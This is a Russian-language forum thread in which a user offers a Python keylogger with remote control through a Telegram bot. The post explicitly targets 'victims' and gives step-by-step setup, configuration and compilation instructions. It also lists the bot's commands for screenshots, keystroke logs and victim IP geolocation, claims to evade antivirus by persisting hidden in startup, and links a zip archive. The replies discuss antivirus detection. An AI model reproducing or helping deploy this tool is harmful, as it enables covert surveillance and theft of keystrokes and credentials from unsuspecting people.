Кейлоггер + частичный удаленный доступ [Python]

dont_copy

Новичок
Статус
offline
Регистрация
08.12.2019
Сообщения
5
Репутация
1
Решил плотно подойти к изучению Python. Есть множество идей и начатых проектов, этот один из них.
Данная программа запускает сервер для чат бота TG на целевой машине (жертве) и мы посредством команд этому чат боту можем управлять виндой жертвы. Функционал пока что минимальный, но тем не менее довольно полезный. Есть возможность удаленно включать/выключать кейлоггер (файлы с логами прилетают в чат с ботом), получение скриншотов экрана в реальном времени, получение внешнего IP, имени пользователя системы и геолокации по IP. Главные преимущества: не палится антивирусом (тестировал на авасте); вообще не нагружает систему (юзер не заметит изменений после заражения); работает стабильно, не вылетает; сам проникает в стартап и помечает себя скрытым файлом; есть возможность использовать прокси. Минусы: написано на Python, следовательно после компиляции файл весит около 45 мег.

[Инструкция]

Устанавливаем Python 3 последней версии
В папке looker запускаем pip_install.bat. Ждём пока скачаются и обновятся необходимые библиотеки
Получаем chat_id:
Открываем get_chat_id.py. token = Вставляем токен бота TG, password = любой, неважно
Сохраняем, запускаем get_chat_id.bat. Далее находим нашего бота в телеграме (по имени или ID) и отправляем ему пароль
Он пришлет chat_id

Далее:

В файле main.py редактируем переменные:
token = здесь вставляем токен который дается после создания бота TG
chat_id = здесь пишем наш chat_id
file_name = важное поле. здесь нужно указать название файла, которое вы дадите программе после компиляции. Необходимо для копирования себя в стартап
file_mask = имя программы в диспетчере задач (переименуется уже в папке стартап)
proxy_ip, proxy_port = соответсвенно сам прокси (если необходим, иначе оставьте None) ВАЖНО: тип прокси должен быть socks 5, иначе работать не будет. Для тестирования юзал фришные тут https://hidemy.name/ru/proxy-list/. При получении chat_id при необходимости тоже можно указать прокси

В файле кейлоггер:

st = 1 - кейлоггер включен по умолчанию при запуске, 0 - выключен по умолчанию при запуске
max_count = количество символов умноженое на 10, после набора которых вы получите файл лога

После редактирования параметров производим тестовый запуск. Запускаем start.bat и пишем чат боту одну из команд:

[Команды для бота]

clients - получение всех жертв (имя пользователя, IP, геолокация)
user screen - получение скриншота экрана, где user - это имя пользователя жертвы или IP
user kl start - запуск кейлоггера
user kl stop - выключение кейлоггера

На этом этапе на командную строку не стоит обращать внимания, возможно будут вылетать ошибки TG-пула, но сама программа продолжит работать и функционировать.
Если тестирование прошло отлично, можно приступать к компиляции

Открываем командную строку и пишем pyinstaller c:\полный_путь_к_папке_looker\main.py -F -w
Флаг -F нужен для создания одного единственного файла ехе
Флаг -w необходим для сокрытия консоли при запуске и после запуска ехе

ВАЖНО: не забываем переименовать ехе файл в то имя, которое указали в переменной file_name

Впринципе всё, про тонкости внедрения говорить не буду, главное что бы файл был запущен один раз, а дальше дело техники.

Буду рад, если поможете своими идеями по расширению функционала и поиском серьезных багов. Планирую переписать прогу на C++, думаю так будет лучше, но пока что с этим языком не особо дружу.

В общем если тема заёдет, залью обновление
 

Вложения

  • looker.zip
    4.2 KB · Просмотры: 26

xtemple666

Резидент
Статус
offline
Регистрация
25.01.2020
Сообщения
220
Репутация
195
Так а смысл? он всем палиться будет, это ж питон
 

xtemple666

Резидент
Статус
offline
Регистрация
25.01.2020
Сообщения
220
Репутация
195
Я бы не сказал. Какая разница если на выходе ехе файл
такая, что например исходник ехешника написанного на плюсах, гораздо сложнее получить, чем на питоне. По сути ехешник питона с открытым кодом
 

dont_copy

Новичок
Статус
offline
Регистрация
08.12.2019
Сообщения
5
Репутация
1
такая, что например исходник ехешника написанного на плюсах, гораздо сложнее получить, чем на питоне. По сути ехешник питона с открытым кодом
А, ты об этом. Согласен, вот только исходный код не даст никакой информации. Получишь токен бота, почитаешь инфу о самом себе и всё по сути
 

xtemple666

Резидент
Статус
offline
Регистрация
25.01.2020
Сообщения
220
Репутация
195
А, ты об этом. Согласен, вот только исходный код не даст никакой информации. Получишь токен бота, почитаешь инфу о самом себе и всё по сути
антивирусы в курсах всех алгоритмов логгеров, стилеров и тд, в этом суть
 

dont_copy

Новичок
Статус
offline
Регистрация
08.12.2019
Сообщения
5
Репутация
1
антивирусы в курсах всех алгоритмов логгеров, стилеров и тд, в этом суть
Я авастом проверял, за другие говорить не буду. Аваст молчит, а проге даже доступ админа не нужен
 

xtemple666

Резидент
Статус
offline
Регистрация
25.01.2020
Сообщения
220
Репутация
195
ну хз, я собрал билд pyinstaller'oм он сразу же отлетел от аваста
 

xtemple666

Резидент
Статус
offline
Регистрация
25.01.2020
Сообщения
220
Репутация
195
ну вообще на удивление билд чистый довольно
 

dont_copy

Новичок
Статус
offline
Регистрация
08.12.2019
Сообщения
5
Репутация
1
1592244448150.png


Тогда я немного не понимаю с чем это может быть связано. Как тестировать антивирусом если у разных людей разные результаты
 

xtemple666

Резидент
Статус
offline
Регистрация
25.01.2020
Сообщения
220
Репутация
195